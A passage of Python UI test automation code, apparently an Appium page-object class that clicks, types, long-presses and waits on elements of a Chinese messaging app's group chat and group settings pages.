@TestLogger.log()\n def click_start_call_button(self):\n \"\"\"点击开始呼叫按钮 \"\"\"\n self.click_element((MobileBy.IOS_PREDICATE, 'name CONTAINS \"呼叫\"'))\n\n\n @TestLogger.log('点击输入框')\n def click_input_box(self):\n self.click_element(self.__locators['说点什么'])\n\n @TestLogger.log('输入消息文本')\n def input_message_text(self, content):\n \"\"\"输入消息文本(清空之前文本框的文本)\"\"\"\n self.input_text(self.__locators['说点什么'], content)\n\n @TestLogger.log('输入消息文本')\n def input_message_text2(self, content):\n \"\"\"输入消息文本--不清空之前文本框的文本\"\"\"\n self.input_text2(self.__locators['说点什么'], content)\n\n\n @TestLogger.log()\n def long_press_input_box(self):\n \"\"\"长按输入框(备注:群聊使用该方法需要发送两条文本消息)\"\"\"\n self.swipe_by_direction(self.__class__.__locators['说点什么'], 'press',duration=2)\n time.sleep(2)\n\n\n\n @TestLogger.log('点击发送按钮')\n def click_send_button(self):\n self.click_element(self.__locators['发送按钮'])\n\n @TestLogger.log()\n def select_members_by_name(self, name='大佬1'):\n \"\"\"通过名字选择成员\"\"\"\n locator = (MobileBy.ACCESSIBILITY_ID, '%s' % name)\n self.click_element(locator)\n\n 
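# 补充示例(新增注释,非原始代码):__locators 的值都是 (定位方式, 表达式) 二元组,上面的 select_members_by_name 即按此模式动态拼出 ACCESSIBILITY_ID。一个最小的独立用法示意(假设 driver 为底层 appium webdriver,'大佬1' 仅为演示名称):\n    #\n    #     by, value = (MobileBy.ACCESSIBILITY_ID, '大佬1')\n    #     driver.find_element(by, value).click()\n\n    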
@TestLogger.log()\n def get_input_message(self):\n \"\"\"获取输入框的信息\"\"\"\n el = self.get_element(self.__class__.__locators[\"说点什么\"])\n return el.text\n\n @TestLogger.log('发送多条文本消息')\n def send_mutiple_message(self, text='文本消息', times=15):\n while times > 0:\n times = times - 1\n self.click_input_box()\n self.input_message_text(text)\n self.click_send_button()\n time.sleep(2)\n\n\n @TestLogger.log()\n def click_send_slide_up(self, duration=5):\n \"\"\"点击发送按钮并向上滑动\"\"\"\n el = self.get_element(self.__class__.__locators[\"发送按钮\"])\n rect = el.rect\n left, right = int(rect['x']) + 1, int(rect['x'] + rect['width']) - 1\n top, bottom = int(rect['y']) + 1, int(rect['y'] + rect['height']) - 1\n x_start = (left + right) // 2\n x_end = (left + right) // 2\n y_start = bottom\n y_end = top - 200\n self.driver.execute_script(\"mobile:dragFromToForDuration\",\n {\"duration\": duration, \"element\": None, \"fromX\": x_start,\n \"fromY\": y_start,\n \"toX\": x_end, \"toY\": y_end})\n\n @TestLogger.log()\n def click_send_slide_down(self, duration=5):\n \"\"\"点击发送按钮并向下滑动\"\"\"\n el = self.get_element(self.__class__.__locators[\"发送按钮\"])\n rect = el.rect\n left, right = int(rect['x']) + 1, int(rect['x'] + rect['width']) - 1\n top, bottom = int(rect['y']) + 1, int(rect['y'] + rect['height']) - 1\n x_start = (left + right) // 2\n x_end = (left + right) // 2\n y_start = top\n y_end = bottom + 200\n self.driver.execute_script(\"mobile:dragFromToForDuration\",\n {\"duration\": duration, \"element\": None, \"fromX\": x_start,\n \"fromY\": y_start,\n \"toX\": x_end, \"toY\": y_end})\n\n @TestLogger.log()\n def get_width_of_last_msg(self):\n \"\"\"获取最后一条文本信息框的大小\"\"\"\n el = self.get_element(self.__class__.__locators[\"最后一条文本消息\"])\n rect = el.rect\n return rect[\"width\"]\n\n @TestLogger.log()\n def get_height_of_last_msg(self):\n \"\"\"获取最后一条文本信息框的大小\"\"\"\n el = self.get_element(self.__class__.__locators[\"最后一条文本消息\"])\n rect = el.rect\n return rect[\"height\"]\n\n @TestLogger.log()\n def click_exit_voice(self):\n \"\"\"点击退出语音录制\"\"\"\n self.click_element(self.__class__.__locators[\"退出按钮\"])\n\n @TestLogger.log()\n def is_exist_video_play_button(self):\n \"\"\"是否存在视频播放按钮\"\"\"\n return self._is_element_present(self.__class__.__locators[\"视频播放按钮\"])\n\n def is_exist_msg_dictation(self):\n \"\"\"当前页面是否有小键盘麦克\"\"\"\n el = self.get_elements(self.__locators['小键盘麦克标志'])\n return len(el) > 0\n\n @TestLogger.log('判断消息记录是否存在消息记录')\n def is_element_present_message(self):\n return self._is_element_present(self.__class__.__locators['聊天列表'])\n\n @TestLogger.log()\n def click_message_approval(self):\n \"\"\"点击审批内容\"\"\"\n self.click_element((MobileBy.IOS_PREDICATE, 'name CONTAINS \"审批\"'))\n\n @TestLogger.log()\n def press_and_move_right_approval(self):\n \"\"\"长按审批消息\"\"\"\n time.sleep(2)\n element = (MobileBy.IOS_PREDICATE, 'name CONTAINS \"审批\"')\n self.swipe_by_direction(element, 'right')\n time.sleep(2)\n\n @TestLogger.log()\n def press_and_move_right_daily_log(self):\n \"\"\"长按日志消息\"\"\"\n time.sleep(2)\n element = (MobileBy.IOS_PREDICATE, 'name CONTAINS \"日报\"')\n self.swipe_by_direction(element, 'right', duration=2)\n time.sleep(2)\n\n @TestLogger.log()\n def press_and_move_right_text_message(self):\n \"\"\"长按文本消息(备注:群聊使用该方法需要发送两条文本消息)\"\"\"\n time.sleep(2)\n locator = (MobileBy.XPATH, \"//XCUIElementTypeCell[last()]/XCUIElementTypeOther/XCUIElementTypeImage/XCUIElementTypeOther\")\n self.swipe_by_direction(locator, 'left')\n time.sleep(2)\n\n\n def is_exist_msg_videos(self):\n \"\"\"当前页面是否有发视频消息\"\"\"\n el = 
self.get_elements(self.__locators['消息视频'])\n return len(el) > 0\n\n def is_exist_msg_image(self):\n \"\"\"当前页面是否有发图片消息\"\"\"\n el = self.get_elements(self.__locators['消息图片'])\n return len(el) > 0\n\n @TestLogger.log()\n def click_msg_image(self, number):\n \"\"\"点击图片消息\"\"\"\n els = self.get_elements(self.__class__.__locators[\"消息图片\"])\n els[number].click()\n\n @TestLogger.log()\n def is_exists_group_by_name(self, name):\n \"\"\"是否存在指定群聊名\"\"\"\n locator = (MobileBy.XPATH, '//*[@resource-id=\"com.chinasofti.rcs:id/title\" and contains(@text, \"%s\")]' % name)\n return self._is_element_present(locator)\n\n @TestLogger.log()\n def is_exist_collection(self):\n \"\"\"是否存在消息已收藏\"\"\"\n return self.is_toast_exist(\"已收藏\")\n\n @TestLogger.log()\n def is_exist_forward(self):\n \"\"\"是否存在消息已转发\"\"\"\n return self.is_toast_exist(\"已转发\")\n\n @TestLogger.log()\n def click_take_picture(self):\n \"\"\"点击选择富媒体拍照\"\"\"\n self.click_element(self.__class__.__locators[\"富媒体拍照\"])\n\n @TestLogger.log()\n def is_send_sucess(self):\n \"\"\"当前页面是否有发送失败标识\"\"\"\n el = self.get_elements(self.__locators['发送失败标识'])\n if len(el) > 0:\n return False\n return True\n\n @TestLogger.log()\n def click_picture(self):\n \"\"\"点击选择照片\"\"\"\n self.click_element(self.__class__.__locators[\"选择照片\"])\n\n @TestLogger.log()\n def click_setting(self):\n \"\"\"点击设置\"\"\"\n self.click_element(self.__class__.__locators[\"设置\"])\n\n @TestLogger.log()\n def wait_for_page_load(self, timeout=8, auto_accept_alerts=True):\n \"\"\"等待群聊页面加载\"\"\"\n try:\n self.wait_until(\n timeout=timeout,\n auto_accept_permission_alert=auto_accept_alerts,\n condition=lambda d: self._is_element_present(self.__class__.__locators[\"多方通话\"])\n )\n except:\n message = \"页面在{}s内,没有加载成功\".format(str(timeout))\n raise AssertionError(\n message\n )\n return self\n\n @TestLogger.log()\n def wait_for_group_control_page_load(self, timeout=8, auto_accept_alerts=True):\n \"\"\"等待群管理页面加载\"\"\"\n try:\n self.wait_until(\n timeout=timeout,\n auto_accept_permission_alert=auto_accept_alerts,\n condition=lambda d: self._is_element_present(self.__class__.__locators[\"解散群\"])\n )\n except:\n message = \"页面在{}s内,没有加载成功\".format(str(timeout))\n raise AssertionError(\n message\n )\n return self\n\n @TestLogger.log()\n def is_on_this_page(self):\n \"\"\"当前页面是否在群聊天页\"\"\"\n el = self.get_elements(self.__locators['多方通话'])\n if len(el) > 0:\n return True\n return False\n\n @TestLogger.log()\n def click_profile(self):\n \"\"\"点击选择名片\"\"\"\n self.click_element(self.__class__.__locators[\"选择名片\"])\n\n @TestLogger.log()\n def click_back(self):\n \"\"\"点击返回按钮\"\"\"\n self.click_element(self.__class__.__locators[\"返回\"])\n\n @TestLogger.log()\n def is_exist_undisturb(self):\n \"\"\"是否存在消息免打扰标志\"\"\"\n return self._is_element_present(self.__class__.__locators[\"消息免打扰\"])\n\n\n @TestLogger.log()\n def press_file_to_do(self, file, text):\n \"\"\"长按指定文件进行操作\"\"\"\n el = self.get_element((MobileBy.XPATH, \"//*[contains(@text, '%s')]\" % file))\n self.press(el)\n self.click_element(self.__class__.__locators[text])\n\n @TestLogger.log()\n def press_file(self, file):\n \"\"\"长按指定文件\"\"\"\n el = self.get_element((MobileBy.XPATH, \"//*[contains(@text, '%s')]\" % file))\n self.press(el)\n\n @TestLogger.log()\n def is_address_text_present(self):\n \"\"\"判断位置信息是否在群聊页面发送\"\"\"\n el = self.get_element((MobileBy.ID, 'com.chinasofti.rcs:id/lloc_famous_address_text'))\n if el:\n return True\n else:\n return False\n\n @TestLogger.log()\n def press_message_to_do(self, text):\n \"\"\"长按指定信息进行操作\"\"\"\n el = 
self.get_element((MobileBy.ID, 'com.chinasofti.rcs:id/lloc_famous_address_text'))\n        self.press(el)\n        self.click_element(self.__class__.__locators[text])\n\n    @TestLogger.log()\n    def wait_for_message_down_file(self, timeout=20, auto_accept_alerts=True):\n        \"\"\"等待消息发送成功\"\"\"\n        try:\n            self.wait_until(\n                timeout=timeout,\n                auto_accept_permission_alert=auto_accept_alerts,\n                condition=lambda d: self._is_element_present(self.__class__.__locators[\"勾\"])\n            )\n        except:\n            message = \"消息在{}s内,没有发送成功\".format(str(timeout))\n            raise AssertionError(\n                message\n            )\n        return self\n\n    @TestLogger.log()\n    def is_exist_network(self):\n        \"\"\"是否存网络不可用\"\"\"\n        return self.is_toast_exist(\"网络不可用,请检查网络设置\")\n\n    @TestLogger.log()\n    def click_send_again(self):\n        \"\"\"点击重新发送gif\"\"\"\n        self.click_element(self.__class__.__locators[\"发送失败标识\"])\n        self.click_element(self.__class__.__locators[\"重发消息确定\"])\n\n    @TestLogger.log()\n    def is_exist_msg_send_failed_button(self):\n        \"\"\"判断是否有重发按钮\"\"\"\n        el = self.get_elements(self.__locators['重发按钮'])\n        return len(el) > 0\n\n    @TestLogger.log()\n    def click_msg_send_failed_button(self):\n        \"\"\"点击重发按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"重发按钮\"])\n\n    @TestLogger.log()\n    def click_resend_confirm(self):\n        \"\"\"点击重发消息确定\"\"\"\n        self.click_element(self.__class__.__locators[\"重发消息确定\"])\n\n    @TestLogger.log()\n    def click_clean_video(self):\n        \"\"\"点击删除消息视频\"\"\"\n        try:\n            el = self.get_element(self.__class__.__locators[\"消息视频\"])\n            self.press(el)\n            self.click_element(self.__class__.__locators[\"删除\"])\n        except:\n            pass\n        return self\n\n    @TestLogger.log()\n    def press_voice_message_to_do(self,text):\n        \"\"\"长按语音消息体\"\"\"\n        el = self.get_element((MobileBy.ID, 'com.chinasofti.rcs:id/linearlayout_msg_content'))\n        self.press(el)\n        self.click_element(self.__class__.__locators[text])\n\n    @TestLogger.log()\n    def get_width_of_msg_of_text(self):\n        \"\"\"获取文本信息框的宽度\"\"\"\n        el=self.get_element((MobileBy.ID,'com.chinasofti.rcs:id/tv_message'))\n        rect=el.rect\n        return rect[\"width\"]\n\n    @TestLogger.log()\n    def is_call_page_load(self):\n        \"\"\"判断是否可以发起呼叫\"\"\"\n        el = self.get_element((MobileBy.ID, 'com.android.incallui:id/endButton'))\n        if el:\n            return True\n        else:\n            return False\n\n    @TestLogger.log()\n    def click_end_call_button(self):\n        \"\"\"点击结束呼叫按钮 \"\"\"\n        self.click_element((MobileBy.ID, 'com.android.incallui:id/endButton'))\n\n    @TestLogger.log()\n    def click_location_back(self):\n        \"\"\"点击位置页面返回 \"\"\"\n        self.click_element(self.__class__.__locators['位置返回'])\n\n    @TestLogger.log()\n    def get_picture_nums(self):\n        \"\"\"获取当前页面图片元素数量\"\"\"\n        els = self.get_elements(self.__class__.__locators['图片元素数量'])\n        return len(els)\n\n    @TestLogger.log()\n    def click_add_member_button(self):\n        \"\"\"点击添加成员按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"添加群成员按钮\"])\n\n    @TestLogger.log()\n    def click_delete_member_button(self):\n        \"\"\"删除成员按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"删除群成员按钮\"])\n\n    @TestLogger.log()\n    def click_delete_member_sure_button(self):\n        \"\"\"删除成员确定按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"删除群成员确定按钮\"])\n\n    @TestLogger.log()\n    def wait_for_page_setting_load(self, timeout=8, auto_accept_alerts=True):\n        \"\"\"等待群聊设置页面加载\"\"\"\n        try:\n            self.wait_until(\n                timeout=timeout,\n                auto_accept_permission_alert=auto_accept_alerts,\n                condition=lambda d: self._is_element_present(self.__class__.__locators[\"添加群成员按钮\"])\n            )\n        except:\n            message = \"页面在{}s内,没有加载成功\".format(str(timeout))\n            raise AssertionError(\n                message\n            )\n        return self\n\n    
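# 补充示例(新增注释,非原始代码):上面各 wait_for_* 方法的轮询等待也可以用 selenium 的显式等待直接实现,效果等价(仅为示意,假设 self.driver 为底层 appium driver):\n    #\n    #     from selenium.webdriver.support.ui import WebDriverWait\n    #     WebDriverWait(self.driver, timeout).until(\n    #         lambda d: len(d.find_elements(MobileBy.IOS_PREDICATE,\n    #                                       'name CONTAINS \"cc_chat_groupchat_add_normal\"')) > 0)\n\n    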
@TestLogger.log()\n    def click_phone_contact(self):\n        \"\"\"点击选择手机联系人\"\"\"\n        self.click_element(self.__class__.__locators[\"选择手机联系人\"])\n\n    @TestLogger.log()\n    def no_disturbing_btn_is_enabled(self):\n        \"\"\"获取群消息免打扰按钮状态是否可点击\"\"\"\n        return self._is_enabled(self.__class__.__locators[\"群消息免打扰按钮\"])\n\n    @TestLogger.log()\n    def get_no_disturbing_btn_text(self):\n        \"\"\"获取群消息免打扰按钮状态\"\"\"\n        if self._is_element_present2(self.__class__.__locators[\"群消息免打扰按钮\"]):\n            el = self.get_element(self.__class__.__locators[\"群消息免打扰按钮\"])\n            return el.text\n\n    @TestLogger.log()\n    def click_no_disturbing_button(self):\n        \"\"\"点击群消息免打扰开关\"\"\"\n        self.click_element(self.__class__.__locators[\"群消息免打扰按钮\"])\n\n    @TestLogger.log()\n    def click_group_name(self):\n        \"\"\"点击修改群名称按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"群名称\"])\n\n    @TestLogger.log()\n    def input_group_name_message(self, message):\n        \"\"\"输入要修改的群名称\"\"\"\n        self.input_text(self.__class__.__locators[\"修改群名称输入框\"], message)\n        return self\n\n    @TestLogger.log()\n    def click_group_name_complete(self):\n        \"\"\"点击修改群名称完成按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"修改群名称完成按钮\"])\n\n    @TestLogger.log()\n    def click_group_control(self):\n        \"\"\"点击群管理按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"群管理\"])\n\n    @TestLogger.log()\n    def click_group_dissolve(self):\n        \"\"\"点击解散群按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"解散群\"])\n\n    @TestLogger.log()\n    def click_group_dissolve_confirm(self):\n        \"\"\"点击确认群解散按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"解散按钮\"])\n\n    @TestLogger.log()\n    def click_add_member_confirm_button(self):\n        \"\"\"点击添加群成员确定按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"添加群成员确定按钮\"])\n\n    @TestLogger.log()\n    def click_voice_button(self):\n        \"\"\"点击语音按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"语音按钮\"])\n\n    @TestLogger.log()\n    def is_exist_voice_button(self):\n        \"\"\"是否存在语音按钮\"\"\"\n        return self._is_element_present2(self.__class__.__locators[\"语音按钮\"])\n\n    @TestLogger.log()\n    def click_send_button(self):\n        \"\"\"点击发送按钮\"\"\"\n        # 注:此方法与前文的 click_send_button 重复定义,类体中后出现的此定义生效\n        self.click_element(self.__class__.__locators[\"发送按钮\"])\n\n    @TestLogger.log()\n    def _is_enabled_send_button(self):\n        \"\"\"发送按钮是否可点击\"\"\"\n        return self._is_enabled(self.__class__.__locators[\"发送按钮\"])\n\n    @TestLogger.log()\n    def is_exist_send_button(self):\n        \"\"\"是否存在发送按钮\"\"\"\n        return self._is_element_present2(self.__class__.__locators[\"发送按钮\"])\n\n    @TestLogger.log()\n    def click_add_button(self):\n        \"\"\"点击更多加号按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"更多加号按钮\"])\n\n    @TestLogger.log()\n    def click_file_button(self):\n        \"\"\"点击文件按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"文件按钮\"])\n\n    @TestLogger.log()\n    def is_exist_file_button(self):\n        \"\"\"是否存在文件按钮\"\"\"\n        return self._is_element_present(self.__class__.__locators[\"文件按钮\"])\n\n    @TestLogger.log()\n    def click_expression_button(self):\n        \"\"\"点击表情按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"表情按钮\"])\n\n    @TestLogger.log()\n    def click_expression_wx(self):\n        \"\"\"点击微笑表情\"\"\"\n        self.click_element(self.__class__.__locators[\"微笑表情\"])\n\n    @TestLogger.log()\n    def click_expression_qx(self):\n        \"\"\"点击窃喜表情\"\"\"\n        self.click_element(self.__class__.__locators[\"窃喜表情\"])\n\n    @TestLogger.log()\n    def click_expression_lbt(self):\n        \"\"\"点击流鼻涕表情\"\"\"\n        self.click_element(self.__class__.__locators[\"流鼻涕表情\"])\n\n    @TestLogger.log()\n    def click_gif_button(self):\n        \"\"\"点击GIF按钮\"\"\"\n        self.click_element(self.__class__.__locators[\"GIF按钮\"])\n\n    @TestLogger.log()\n    
def is_exists_gif_button(self):\n \"\"\"是否存在GIF按钮\"\"\"\n return self._is_element_present2(self.__class__.__locators[\"GIF按钮\"])\n\n @TestLogger.log()\n def click_send_gif(self):\n \"\"\"点击发送GIF图片\"\"\"\n self.click_element(self.__class__.__locators[\"gif图片\"])\n\n @TestLogger.log()\n def is_exist_close_gif(self):\n \"\"\"是否存在关闭GIF按钮\"\"\"\n return self._is_element_present(self.__class__.__locators[\"关闭GIF按钮\"])\n\n @TestLogger.log()\n def click_close_gif(self):\n \"\"\"点击关闭GIF按钮\"\"\"\n self.click_element(self.__class__.__locators[\"关闭GIF按钮\"])\n\n @TestLogger.log()\n def is_exist_expression_page(self):\n \"\"\"是否存在表情页\"\"\"\n return self._is_element_present(self.__class__.__locators[\"表情页\"])\n\n @TestLogger.log()\n def click_expression_page_close_button(self):\n \"\"\"点击表情页关闭\"\"\"\n self.click_element(self.__class__.__locators[\"关闭表情页\"])\n\n @TestLogger.log()\n def get_expressions(self):\n \"\"\"获取表情包\"\"\"\n els = self.get_elements(self.__locators['表情'])\n return els\n\n @TestLogger.log()\n def get_input_box(self):\n \"\"\"获取输入框\"\"\"\n el = self.get_element(self.__locators['输入框'])\n return el\n\n @TestLogger.log()\n def is_enabled_of_send_button(self):\n \"\"\"发送按钮状态\"\"\"\n flag = self._is_enabled((MobileBy.ID, 'com.chinasofti.rcs:id/ib_send'))\n return flag\n\n @TestLogger.log()\n def is_exist_multiple_selection_back(self):\n \"\"\"是否存在多选【×】关闭按钮\"\"\"\n return self._is_element_present(self.__class__.__locators[\"多选返回\"])\n\n @TestLogger.log()\n def is_exist_multiple_selection_count(self):\n \"\"\"是否存在多选计数\"\"\"\n return self._is_element_present(self.__class__.__locators[\"多选计数\"])\n\n @TestLogger.log()\n def get_multiple_selection_select_box(self):\n \"\"\"获取多选选择框\"\"\"\n els=self.get_elements(self.__class__.__locators[\"多选选择框\"])\n if els:\n return els\n else:\n raise AssertionError(\"没有找到多选选择框\")\n\n @TestLogger.log()\n def is_enabled_multiple_selection_delete(self):\n \"\"\"判断多选删除是否高亮展示\"\"\"\n return self._is_enabled(self.__class__.__locators[\"多选删除\"])\n\n @TestLogger.log()\n def is_enabled_multiple_selection_forward(self):\n \"\"\"判断多选转发是否高亮展示\"\"\"\n return self._is_enabled(self.__class__.__locators[\"多选转发\"])\n\n @TestLogger.log()\n def click_multiple_selection_back(self):\n \"\"\"点击多选返回\"\"\"\n self.click_element(self.__class__.__locators[\"多选返回\"])\n\n @TestLogger.log()\n def is_exist_multiple_selection_select_box(self):\n \"\"\"是否存在多选选择框\"\"\"\n return self._is_element_present(self.__class__.__locators[\"多选选择框\"])\n\n @TestLogger.log()\n def click_multiple_selection_delete(self):\n \"\"\"点击多选删除\"\"\"\n self.click_element(self.__class__.__locators[\"多选删除\"])\n\n @TestLogger.log()\n def click_multiple_selection_delete_cancel(self):\n \"\"\"点击取消删除已选信息\"\"\"\n self.click_element(self.__class__.__locators[\"取消删除已选信息\"])\n\n @TestLogger.log()\n def click_multiple_selection_delete_sure(self):\n \"\"\"点击确定删除已选信息\"\"\"\n self.click_element(self.__class__.__locators[\"删除已选信息\"])\n\n @TestLogger.log()\n def click_multiple_selection_forward(self):\n \"\"\"点击多选转发\"\"\"\n self.click_element(self.__class__.__locators[\"多选转发\"])\n\n @TestLogger.log()\n def press_audio_to_do(self,text):\n \"\"\"长按语音消息体进行操作\"\"\"\n els = self.get_elements(self.__class__.__locators[\"语音消息体\"])\n if els:\n self.press(els[0])\n self.click_element(self.__class__.__locators[text])\n else:\n raise AssertionError(\"没有找到语音消息体\")\n\n @TestLogger.log()\n def get_group_name(self):\n \"\"\"在群聊页面获取群聊名称\"\"\"\n return self.get_element(self.__class__.__locators['群聊001(2)']).text\n\n @TestLogger.log()\n def 
get_multiple_selection_count(self):\n \"\"\"获取多选计数框\"\"\"\n el = self.get_element(self.__class__.__locators[\"多选计数\"])\n if el:\n return el\n else:\n raise AssertionError(\"没有找到多选计数框\")\n\n @TestLogger.log()\n def press_voice_message(self):\n \"\"\"长按语音消息体\"\"\"\n el = self.get_element((MobileBy.ID, 'com.chinasofti.rcs:id/linearlayout_msg_content'))\n self.press(el)\n\n @TestLogger.log()\n def click_return(self):\n \"\"\"返回上一级\"\"\"\n self.click_element(self.__class__.__locators[\"返回上一级\"])\n\n @TestLogger.log()\n def get_height_of_msg_of_text(self):\n \"\"\"获取文本信息框的高度\"\"\"\n el = self.get_element((MobileBy.ID, 'com.chinasofti.rcs:id/tv_message'))\n rect = el.rect\n return rect[\"height\"]\n\n @TestLogger.log()\n def get_msg_of_text(self):\n \"\"\"获取文本信息框的信息\"\"\"\n el = self.get_element((MobileBy.ID, 'com.chinasofti.rcs:id/tv_message'))\n text = el.text\n return text\n\n @TestLogger.log()\n def input_text_message(self, message):\n \"\"\"输入文本信息\"\"\"\n self.input_text(self.__class__.__locators[\"输入框\"], message)\n return self\n\n @TestLogger.log()\n def send_text(self):\n \"\"\"发送文本\"\"\"\n self.click_element(self.__class__.__locators[\"文本发送按钮\"])\n time.sleep(1)\n\n @TestLogger.log()\n def is_exist_red_dot(self):\n \"\"\"是否存在语音小红点\"\"\"\n return self._is_element_present(self.__class__.__locators[\"语音小红点\"])\n\n @TestLogger.log()\n def click_long_copy_message(self):\n \"\"\"长按输入框并粘贴文本\"\"\"\n self.click_element(self.__locators[\"输入框\"])\n el = self.get_element(self.__locators[\"输入框\"])\n self.press(el)\n time.sleep(1.8)\n self.click_element(self.__locators[\"粘贴\"])\n\n @TestLogger.log()\n def click_long_message(self):\n \"\"\"点击最后一条呵呵消息\"\"\"\n els = self.get_elements(self.__locators[\"呵呵\"])\n el = els[-1]\n el.click()\n\n @TestLogger.log()\n def click_mutilcall(self):\n \"\"\"点击多方通话\"\"\"\n self.click_element(self.__class__.__locators[\"多方通话\"])\n\n @TestLogger.log()\n def select_picture(self):\n \"\"\"选择照片\"\"\"\n self.click_element(self.__class__.__locators[\"照片选择框\"])\n\n @TestLogger.log(\"文件是否发送成功\")\n def check_message_resend_success(self):\n return self._is_element_present(self.__class__.__locators['文件发送成功标志'])\n\n @TestLogger.log(\"当前页面是否有发文件消息\")\n def is_exist_msg_file(self):\n el = self.get_elements(('id', 'com.chinasofti.rcs:id/ll_msg'))\n return len(el) > 0\n\n @TestLogger.log(\"删除当前群聊发送的文件\")\n def delete_group_all_file(self):\n msg_file = self.get_elements(('id', 'com.chinasofti.rcs:id/ll_msg'))\n if msg_file:\n for file in msg_file:\n self.press(file)\n self.click_element(self.__class__.__locators['删除'])\n else:\n print('当前窗口没有可以删除的消息')\n\n @TestLogger.log(\"撤回文件\")\n def recall_file(self, file):\n el = self.wait_until(condition=lambda x: self.get_element((MobileBy.XPATH, \"//*[contains(@text, '%s')]\" % file)))\n self.press(el)\n self.click_element(self.__class__.__locators['撤回'])\n\n @TestLogger.log(\"点击发送的最后的文件\")\n def click_last_file_send_fail(self):\n ele_list = self.get_elements(('id', 'com.chinasofti.rcs:id/ll_msg'))\n ele_list[-1].click()\n\n @TestLogger.log(\"点击预览文件返回\")\n def click_file_back(self):\n self.click_element(self.__locators['预览文件_返回'])\n\n @TestLogger.log(\"预览文件里的更多按钮是否存在\")\n def is_exist_more_button(self):\n return self.wait_until(condition=lambda x: self._is_element_present(self.__locators['预览文件_更多']))\n\n @TestLogger.log(\"点击预览文件里的更多按钮\")\n def click_more_button(self):\n self.click_element(self.__locators['预览文件_更多'])\n\n @TestLogger.log(\"检查预览文件选项是否可用\")\n def check_options_is_enable(self):\n text_list = ['转发', '收藏', '其他应用打开']\n for text in text_list:\n 
if not self._is_enabled(('xpath', '//*[contains(@text, \"{}\")]'.format(text))):\n return False\n return True\n\n @TestLogger.log(\"当前页面是否有发地图消息\")\n def is_exist_loc_msg(self):\n el = self.get_elements(self.__locators['定位_地图'])\n return len(el) > 0\n\n @TestLogger.log(\"撤回位置消息\")\n def recall_loc_msg(self):\n el = self.wait_until(\n condition=lambda x: self.get_elements(self.__locators['定位_地图']))\n self.press(el[-1])\n self.click_element(self.__class__.__locators['撤回'])\n\n @TestLogger.log()\n def is_element_exit_(self, text):\n \"\"\"指定元素是否存在\"\"\"\n return self._is_element_present(self.__class__.__locators[text])\n\n @TestLogger.log()\n def click_element_(self, text):\n \"\"\"点击元素\"\"\"\n self.click_element(self.__class__.__locators[text])\n\n @TestLogger.log()\n def click_text_message_by_number(self, index=0):\n \"\"\"点击某一条文本消息\"\"\"\n els = self.get_elements(self.__class__.__locators[\"文本消息\"])\n els[index].click()\n\n @TestLogger.log()\n def click_last_text_message(self):\n \"\"\"点击最后一条文本消息\"\"\"\n self.click_element(self.__class__.__locators[\"最后一条文本消息\"])\n\n @TestLogger.log()\n def press_last_text_message(self):\n \"\"\"长按最后一条文本消息\"\"\"\n self.swipe_by_direction(self.__class__.__locators[\"最后一条文本消息\"], \"press\", 5)\n\n @TestLogger.log()\n def press_last_text_message_c(self):\n \"\"\"长按最后一条文本消息\"\"\"\n self.swipe_by_direction(self.__class__.__locators[\"最后一条文本消息_c\"], \"press\", 5)\n\n @TestLogger.log()\n def is_clear_the_input_box(self):\n \"\"\"输入框是否清空\"\"\"\n if self._is_element_present2(self.__class__.__locators['输入框']):\n el = self.get_element(self.__class__.__locators['输入框'])\n text = el.text\n if text is None:\n return True\n else:\n return False\n\n @TestLogger.log()\n def is_exists_text_by_input_box(self, text):\n \"\"\"输入框中是否存在指定文本\"\"\"\n if self._is_element_present2(self.__class__.__locators['输入框']):\n el = self.get_element(self.__class__.__locators['输入框'])\n message_text = el.text\n if text in message_text:\n return True\n else:\n return False\n\n @TestLogger.log()\n def get_message_record_number(self):\n \"\"\"获取消息记录数量\"\"\"\n if self._is_element_present2(self.__class__.__locators['消息记录']):\n els = self.get_elements(self.__class__.__locators['消息记录'])\n return len(els)\n else:\n return 0\n\n @TestLogger.log()\n def get_size_of_last_expression_message(self):\n \"\"\"获取最后一条表情消息表情的大小\"\"\"\n if self._is_element_present2(self.__class__.__locators['最后一条表情消息的表情']):\n el = self.get_element(self.__class__.__locators[\"最后一条表情消息的表情\"])\n rect = el.rect\n return rect[\"width\"], rect[\"height\"]\n\n @TestLogger.log()\n def press_file_by_type(self, file_type, index=-1):\n \"\"\"长按指定类型文件,默认选择最后一个\"\"\"\n locator = (MobileBy.IOS_PREDICATE, 'name ENDSWITH \"%s\"' % file_type)\n self.swipe_by_direction2(locator, \"press\", index, 5)\n\n @TestLogger.log()\n def click_delete_text(self):\n \"\"\"修改群名称清除文本\"\"\"\n self.click_element(self.__class__.__locators[\"修改群名称清除文本按钮\"])\n\n @TestLogger.log()\n def delete_text_button_is_enabled(self):\n \"\"\"清除文本按钮是否可点击\"\"\"\n return self._is_clickable(self.__class__.__locators['修改群名称清除文本按钮'])\n\n @TestLogger.log()\n def is_exists_element_by_text(self, text):\n \"\"\"是否存在指定元素\"\"\"\n return self._is_element_present2(self.__class__.__locators[text])\n\n @TestLogger.log()\n def 
